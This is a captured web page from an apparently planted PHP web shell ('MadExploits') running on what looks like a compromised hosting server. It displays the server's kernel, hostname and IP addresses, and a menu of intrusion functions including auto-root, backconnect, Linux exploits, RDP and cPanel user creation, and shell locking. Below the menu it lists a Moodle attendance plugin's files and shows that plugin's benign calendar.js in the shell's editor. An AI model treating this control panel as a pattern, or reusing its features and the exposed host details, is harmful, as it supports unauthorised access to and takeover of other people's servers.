Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.58.213
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
attendance /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
import
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
yui
[ DIR ]
drwxr-xr-x
README.md
1.24
KB
-rw-r--r--
absentee.php
6.19
KB
-rw-r--r--
attendance.php
8.46
KB
-rw-r--r--
calendar.js
4.26
KB
-rw-r--r--
composer.json
200
B
-rw-r--r--
coursesummary.php
4.37
KB
-rw-r--r--
defaultstatus.php
5.39
KB
-rw-r--r--
export.php
8.96
KB
-rw-r--r--
externallib.php
21.81
KB
-rw-r--r--
index.php
2.83
KB
-rw-r--r--
lib.php
17.36
KB
-rw-r--r--
locallib.php
48.19
KB
-rw-r--r--
manage.php
3.69
KB
-rw-r--r--
message.html
2.64
KB
-rw-r--r--
messageselect.php
7.01
KB
-rw-r--r--
mobilestyles.css
753
B
-rw-r--r--
mod_form.php
2.71
KB
-rw-r--r--
module.js
1.01
KB
-rw-r--r--
password.php
2.5
KB
-rw-r--r--
password_ajax.php
2.22
KB
-rw-r--r--
preferences.php
7.38
KB
-rw-r--r--
renderables.php
33.23
KB
-rw-r--r--
renderer.php
127.15
KB
-rw-r--r--
renderhelpers.php
12.47
KB
-rw-r--r--
report.php
3.59
KB
-rw-r--r--
resetcalendar.php
3.72
KB
-rw-r--r--
sessions.php
9.95
KB
-rw-r--r--
settings.php
9.77
KB
-rw-r--r--
styles.css
5.87
KB
-rw-r--r--
take.php
4.43
KB
-rw-r--r--
tempedit.php
3.99
KB
-rw-r--r--
tempmerge.php
3.87
KB
-rw-r--r--
tempusers.php
4.99
KB
-rw-r--r--
thirdpartylibs.xml
256
B
-rw-r--r--
version.php
1.14
KB
-rw-r--r--
view.php
5.67
KB
-rw-r--r--
warnings.php
8.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : calendar.js
/* global YUI */ // eslint-disable-next-line new-cap YUI().use('yui2-container', 'yui2-calendar', function(Y) { var YAHOO = Y.YUI2; document.body.className += ' yui-skin-sam'; YAHOO.util.Event.onDOMReady(function() { var Event = YAHOO.util.Event, Dom = YAHOO.util.Dom, dialog, calendar; var showBtn = Dom.get("show"); Event.on(showBtn, "click", function() { /** * Reset handler and set current day. */ function resetHandler() { calendar.cfg.setProperty("pagedate", calendar.today); calendar.render(); } /** * Close dialog. */ function closeHandler() { dialog.hide(); } // Lazy Dialog Creation - Wait to create the Dialog, and setup document click listeners, // until the first time the button is clicked. if (!dialog) { // Hide Calendar if we click anywhere in the document other than the calendar. Event.on(document, "click", function(e) { var el = Event.getTarget(e); var dialogEl = dialog.element; if (el != dialogEl && !Dom.isAncestor(dialogEl, el) && el != showBtn && !Dom.isAncestor(showBtn, el)) { dialog.hide(); } }); dialog = new YAHOO.widget.Dialog("attcalendarcontainer", { visible: false, context: ["show", "tl", "bl"], buttons: [{text: M.util.get_string('caltoday', 'attendance'), handler: resetHandler, isDefault: true}, {text: M.util.get_string('calclose', 'attendance'), handler: closeHandler}], draggable: false, close: false }); dialog.setHeader(''); dialog.setBody('<div id="cal"></div>'); dialog.render(document.body); dialog.showEvent.subscribe(function() { if (YAHOO.env.ua.ie) { // Since we're hiding the table using yui-overlay-hidden, we // want to let the dialog know that the content size has changed, when // shown. dialog.fireEvent("changeContent"); } }); } // Lazy Calendar Creation - Wait to create the Calendar until the first time the button is clicked. if (!calendar) { calendar = new YAHOO.widget.Calendar("cal", { iframe: false, // Turn iframe off, since container has iframe support. // eslint-disable-next-line camelcase hide_blank_weeks: true // Enable, to demonstrate how we handle changing height, using changeContent. }); calendar.cfg.setProperty("start_weekday", M.attendance.cal_start_weekday); calendar.cfg.setProperty("MONTHS_LONG", M.attendance.cal_months); calendar.cfg.setProperty("WEEKDAYS_SHORT", M.attendance.cal_week_days); calendar.select(new Date(M.attendance.cal_cur_date * 1000)); calendar.render(); calendar.selectEvent.subscribe(function() { if (calendar.getSelectedDates().length > 0) { Dom.get("curdate").value = calendar.getSelectedDates()[0] / 1000; Dom.get("currentdate").submit(); } dialog.hide(); }); calendar.renderEvent.subscribe(function() { // Tell Dialog it's contents have changed, which allows // container to redraw the underlay (for IE6/Safari2). dialog.fireEvent("changeContent"); }); } var seldate = calendar.getSelectedDates(); if (seldate.length > 0) { // Set the pagedate to show the selected date if it exists. calendar.cfg.setProperty("pagedate", seldate[0]); calendar.render(); } dialog.show(); }); }); });
Close